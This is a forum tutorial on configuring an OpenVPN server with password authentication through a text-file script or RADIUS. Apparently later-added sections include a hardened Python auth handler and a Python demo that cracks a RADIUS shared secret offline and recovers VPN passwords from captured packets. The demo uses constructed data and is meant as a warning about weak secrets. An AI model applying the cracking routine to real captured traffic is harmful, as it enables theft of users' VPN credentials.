
[VPN] Set up OpenVPN Server: routing mode + password authentication + text file/POP3

Posted on 9/17/2015 7:34:21 PM
Purpose: clients still connect into the corporate LAN, but for ease of user management the authentication data comes from a text-file database.

Basic settings of the OpenVPN server: the connection mode is routed, and the authentication method is text-file/POP3 username/password authentication.

The virtual device is tun.



1. Download the text-file authentication script checkpsw.sh from http://openvpn.se/files/other/, copy it to the /usr/local/etc/ directory and chmod u+x it.

Notes: 1. If saving the script on Windows and then uploading it to Linux causes problems (typically CRLF line endings), it is best to create a new file with the same name in that directory and paste the contents in from the console.

2. The script does not start with #! (the interpreter line); add it before use.



2. Configure the server configuration file, on the basis of (1).

Add the following lines:

# auth-user-pass-verify cmd method: Query client for username/password and
# run script cmd to verify. If method='via-env', pass
# user/pass via environment, if method='via-file', pass
# user/pass via temporary file.
auth-user-pass-verify /usr/local/etc/checkpsw.sh via-env

# do not request a client certificate; use username/password authentication
client-cert-not-required

# use the username supplied by the client as the Common Name
username-as-common-name

Notes for current OpenVPN versions: external scripts only run when script-security is set. script-security 2 is enough for via-file; via-env additionally requires script-security 3, because it puts the clear-text password into the script's environment, which is why via-file is the safer choice. client-cert-not-required was deprecated in OpenVPN 2.4 and removed in 2.5; the replacement is verify-client-cert none. In both cases only the client certificate check is dropped: the server's ca/cert/key stay in place and the client still verifies the server certificate.

3. Configure the client profile

Comment out

; cert client1.crt
; key client1.key

and add

# prompt for username and password
auth-user-pass



4. Change the PASSFILE variable in checkpsw.sh to:

PASSFILE="/usr/local/etc/psw-file"

5. Create /usr/local/etc/psw-file with the following contents:

Format: Username <Tab> Password

User1        pass
User2        pass

The passwords in this file are stored in clear text, so make it readable only by the account the script runs as (root, or the user/group the server drops to), never world-readable, and keep it out of backups and version control.

Note: after the experiment succeeded I rewrote checkpsw.sh in Perl as well (checkpsw.pl in the directory), and that works too.

6. By the same principle POP3 authentication can be used (^_^ and of course other back ends too).

See popauth.pl in the directory for the script.
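As an added example (not the openvpn.se script and not this post's checkpsw.pl), the following Python handler does the job of checkpsw.sh for the text-file method while closing the two weak points above: it takes the credentials via-file (falling back to via-env), so the password does not sit in the script's environment, and the psw-file keeps salted PBKDF2-SHA256 hashes instead of clear-text passwords. The username-tab-secret layout of psw-file is kept; the hash line format, the iteration count and the function names are this example's own choices. In via-file mode OpenVPN hands the script a temporary file with the username on line 1 and the password on line 2, which is what read_credentials expects.

```python
"""Hardened replacement for checkpsw.sh (auth-user-pass-verify handler).

Added example, not the openvpn.se script: reads the credentials OpenVPN
passes either 'via-file' (argv[1] is a temp file, username on line 1 and
password on line 2) or 'via-env' (username/password environment variables),
looks the user up in a psw-file that keeps salted PBKDF2-SHA256 hashes
instead of clear-text passwords, and exits 0 (accept) or 1 (reject).
The hash line format and the function names are this example's own.
"""
import hashlib
import hmac
import os
import secrets
import sys

PASSFILE = "/usr/local/etc/psw-file"  # same location as step 4 above
ALGO = "pbkdf2_sha256"
ITERATIONS = 100_000


def make_entry(username, password, salt=None, iterations=ITERATIONS):
    """Return one psw-file line: <username> TAB pbkdf2_sha256$<iter>$<salt>$<hex>."""
    if not username or any(c.isspace() for c in username):
        raise ValueError("username must be non-empty and contain no whitespace")
    salt = secrets.token_hex(8) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations)
    return "%s\t%s$%d$%s$%s" % (username, ALGO, iterations, salt, digest.hex())


def parse_passfile(text):
    """Map username -> hash spec. Blank lines and '#'/';' comments are skipped;
    malformed or duplicate lines are errors rather than silently ignored."""
    entries = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        parts = line.split()
        if len(parts) != 2:
            raise ValueError("malformed line %d in password file" % lineno)
        user, spec = parts
        if user in entries:
            raise ValueError("duplicate user %r on line %d" % (user, lineno))
        entries[user] = spec
    return entries


def verify(username, password, entries):
    """True only if the password matches the stored hash. Constant-time compare,
    and an unknown user still costs one PBKDF2 run so timing does not leak existence."""
    spec = entries.get(username)
    if spec is None:
        hashlib.pbkdf2_hmac("sha256", password.encode(), b"no-such-user", ITERATIONS)
        return False
    try:
        algo, iterations, salt, stored = spec.split("$")
        iterations = int(iterations)
    except ValueError:
        return False
    if algo != ALGO or iterations < 1:
        return False
    calc = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations).hex()
    return hmac.compare_digest(calc, stored)


def read_credentials(argv, environ):
    """via-file: OpenVPN writes a temp file with the username on line 1 and the
    password on line 2 and passes its path as the first argument.
    via-env: the username and password environment variables are set instead."""
    if len(argv) > 1:
        with open(argv[1], encoding="utf-8") as fh:
            lines = fh.read().splitlines()
        if len(lines) < 2:
            raise ValueError("credential file must contain username and password lines")
        return lines[0], lines[1]
    return environ["username"], environ["password"]


def main():
    try:
        user, pwd = read_credentials(sys.argv, os.environ)
        with open(PASSFILE, encoding="utf-8") as fh:
            entries = parse_passfile(fh.read())
    except (OSError, KeyError, ValueError) as exc:
        print("auth-user-pass-verify: %s" % exc, file=sys.stderr)
        return 1  # fail closed on any error
    return 0 if verify(user, pwd, entries) else 1


if __name__ == "__main__":
    sys.exit(main())
```

To use it, point the server at it with auth-user-pass-verify /usr/local/etc/checkpsw.py via-file together with script-security 2, and generate psw-file lines with make_entry(username, password) instead of typing passwords into the file.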





(5) Set up OpenVPN Server routing mode + password authentication + RADIUS

Network environment: on the basis of (1), add a Windows 2003 server with IP address 192.168.80.130.

^_^ Sorry, I put the server on the public network. But fortunately it was a test.

Purpose: clients still connect into the corporate LAN, but for ease of user management the authentication data comes from a RADIUS database.

OpenVPN server basic settings: the connection mode is routed, the authentication method is RADIUS, and the virtual device is tun.



1. Set up a RADIUS server

See the appendix on building the IAS service under Windows 2003.

2. Configure radiusplugin

1. radiusplugin_v2.0.tar.gz: builds radiusplugin.so.

Download from http://www.nongnu.org/radiusplugin/

2. libgcrypt support library: builds /usr/lib/libgcrypt.so.11

Download from ftp://ftp.gnupg.org/gcrypt/libgcrypt/libgcrypt-1.2.4.tar.gz

3. libgpg-error support library: builds /usr/local/lib/libgpg-error.so.0

Download from ftp://ftp.gnupg.org/gcrypt/libgpg-error/libgpg-error-1.5.tar.gz

All three are built the usual way: ./configure; make; make install.

What we actually use is radiusplugin.so; the other two are its support libraries.

Once you have radiusplugin.so you are 80% done; the rest is configuration.

Copy radiusplugin.so to /usr/local/etc/lib and write its configuration file radiusplugin.conf.

The content is as follows:

# The NAS identifier which is sent to the RADIUS server
NAS-Identifier=OpenVpn

# The service type which is sent to the RADIUS server
Service-Type=5

# The framed protocol which is sent to the RADIUS server
Framed-Protocol=1

# The NAS port type which is sent to the RADIUS server
NAS-Port-Type=5

# The IP of the machine running the OpenVPN server, which acts as the RADIUS client (NAS)
NAS-IP-Address=192.168.80.129

# Path to the OpenVPN server configuration
OpenVPNConfig=/usr/local/etc/server.conf

# More than one server block can be defined; additional ones act as backups
server
{
# The UDP port for RADIUS accounting.
acctport=1813

# The UDP port for RADIUS authentication.
authport=1812

# The IP of my RADIUS server, where the users have been added.
name=192.168.80.130

# How many times should the plugin resend a request if there is no response?
retry=1

# How long should the plugin wait for a response?
wait=1

# The shared secret. It must match the secret configured for this RADIUS client (NAS) on the server side.
sharedsecret=123456
}

123456 is acceptable only for this test. RADIUS PAP does not encrypt the exchange: the User-Password attribute is merely XORed with MD5 digests derived from this secret, and the Response Authenticator is an unkeyed MD5 over the packet plus the secret, so anyone who can observe the traffic can test guesses of the secret offline and, once it is known, recover every user's VPN password. Use a long random secret, and do not run RADIUS across an untrusted network.



3. Configure the server configuration file, on the basis of (1).

Add the following lines:

# the plugin to load, followed by the path to its configuration file (the radiusplugin.conf written in step 2)
plugin /usr/local/etc/lib/radiusplugin.so /usr/local/etc/radius.conf

# do not request a client certificate; use username/password authentication
client-cert-not-required

# use the username supplied by the client as the Common Name
username-as-common-name

(As with the text-file setup, client-cert-not-required was deprecated in OpenVPN 2.4 and removed in 2.5; use verify-client-cert none there. No script-security setting is needed for a plugin.)

4. Configure the client profile

Comment out

; cert client1.crt
; key client1.key

and add

# prompt for username and password
auth-user-pass
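The plugin does the RADIUS exchange itself; to make the shared-secret caveat from step 2 concrete, here is an added Python example (not radiusplugin's code) that encodes a PAP Access-Request with the attribute values from the radiusplugin.conf above, hides the User-Password the way RFC 2865 section 5.2 prescribes, builds the Access-Accept a server would return, and then plays eavesdropper on that pair: it checks guesses of the secret offline against the Response Authenticator and, with the secret found, unhides the user's VPN password. The username, password, Request Authenticator and candidate-secret list are constructed here, not captured traffic; nothing is sent on the network.

```python
"""What radiusplugin puts on the wire, and what a weak shared secret costs.

Added example, not radiusplugin's code. It encodes a PAP Access-Request with
the attribute values from radiusplugin.conf above, hides the User-Password
as RFC 2865 section 5.2 prescribes, builds the Access-Accept a server would
return, and then acts as an eavesdropper: with the captured pair it checks
secret guesses offline against the Response Authenticator and, once the
secret is known, unhides the user's VPN password. The user, password,
Request Authenticator and candidate-secret list are constructed here.
"""
import hashlib
import os
import struct

ACCESS_REQUEST, ACCESS_ACCEPT = 1, 2
# RFC 2865 attribute type codes
USER_NAME, USER_PASSWORD, NAS_IP_ADDRESS = 1, 2, 4
SERVICE_TYPE, FRAMED_PROTOCOL, NAS_IDENTIFIER, NAS_PORT_TYPE = 6, 7, 32, 61


def hide_password(secret, req_auth, password):
    """RFC 2865 5.2: null-pad to a 16-byte multiple, then XOR each block with
    MD5(secret || previous ciphertext block), the first block keyed by the
    Request Authenticator. This is obfuscation keyed only by the secret."""
    pwd = password.encode()
    pwd += b"\0" * (-len(pwd) % 16)
    if not pwd:
        pwd = b"\0" * 16
    out, prev = b"", req_auth
    for i in range(0, len(pwd), 16):
        key = hashlib.md5(secret + prev).digest()
        block = bytes(p ^ k for p, k in zip(pwd[i:i + 16], key))
        out += block
        prev = block
    return out


def unhide_password(secret, req_auth, hidden):
    """Inverse of hide_password; anyone holding the secret can run it."""
    out, prev = b"", req_auth
    for i in range(0, len(hidden), 16):
        chunk = hidden[i:i + 16]
        key = hashlib.md5(secret + prev).digest()
        out += bytes(c ^ k for c, k in zip(chunk, key))
        prev = chunk
    return out.rstrip(b"\0").decode("utf-8", errors="replace")


def attr(code, value):
    """Encode one type/length/value attribute; ints become 4-byte big-endian."""
    if isinstance(value, int):
        value = struct.pack(">I", value)
    elif isinstance(value, str):
        value = value.encode()
    return struct.pack("BB", code, 2 + len(value)) + value


def parse_attrs(data):
    attrs, i = [], 0
    while i < len(data):
        code, length = data[i], data[i + 1]
        attrs.append((code, data[i + 2:i + length]))
        i += length
    return attrs


def build_access_request(secret, ident, req_auth, username, password):
    """Access-Request carrying the values radiusplugin.conf above configures."""
    attrs = (attr(USER_NAME, username)
             + attr(USER_PASSWORD, hide_password(secret, req_auth, password))
             + attr(NAS_IP_ADDRESS, bytes(int(o) for o in "192.168.80.129".split(".")))
             + attr(SERVICE_TYPE, 5) + attr(FRAMED_PROTOCOL, 1)
             + attr(NAS_IDENTIFIER, "OpenVpn") + attr(NAS_PORT_TYPE, 5))
    header = struct.pack(">BBH", ACCESS_REQUEST, ident, 20 + len(attrs))
    return header + req_auth + attrs


def build_access_accept(secret, request, attrs=b""):
    """Server side. Response Authenticator =
    MD5(Code || ID || Length || RequestAuth || Attributes || Secret) (RFC 2865 3)."""
    header = struct.pack(">BBH", ACCESS_ACCEPT, request[1], 20 + len(attrs))
    resp_auth = hashlib.md5(header + request[4:20] + attrs + secret).digest()
    return header + resp_auth + attrs


def secret_matches(secret, request, response):
    """Eavesdropper's offline check of one secret guess against a captured pair."""
    calc = hashlib.md5(response[:4] + request[4:20] + response[20:] + secret).digest()
    return calc == response[4:20]


def crack_secret(candidates, request, response):
    return next((s for s in candidates if secret_matches(s, request, response)), None)


def recover_password(secret, request):
    """With the secret known, pull the clear-text password out of a captured request."""
    for code, value in parse_attrs(request[20:]):
        if code == USER_PASSWORD:
            return unhide_password(secret, request[4:20], value)
    return None


if __name__ == "__main__":
    secret = b"123456"                      # the value used in radiusplugin.conf above
    req_auth = os.urandom(16)               # the NAS picks this per request
    request = build_access_request(secret, 7, req_auth, "User1", "pass")
    response = build_access_accept(secret, request)
    guessed = crack_secret([b"password", b"secret", b"radius", b"123456"], request, response)
    print("secret recovered offline:", guessed)
    print("VPN password:", recover_password(guessed, request))
```

The attacker needs nothing but one captured request/response pair: each guess costs a single MD5, so a short or dictionary secret falls immediately, and every password that ever crossed that link with the same secret falls with it.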





Posted on 9/22/2015 2:55:31 AM
Whether I can use it or not, reply first.
Posted on 2/26/2017 11:18:54 AM
Support and encouragement.
Posted on 10/22/2018 2:09:08 PM
Hello, I have some questions, can you help me fix them?
Posted on 10/22/2018 11:37:40 PM
Learning it.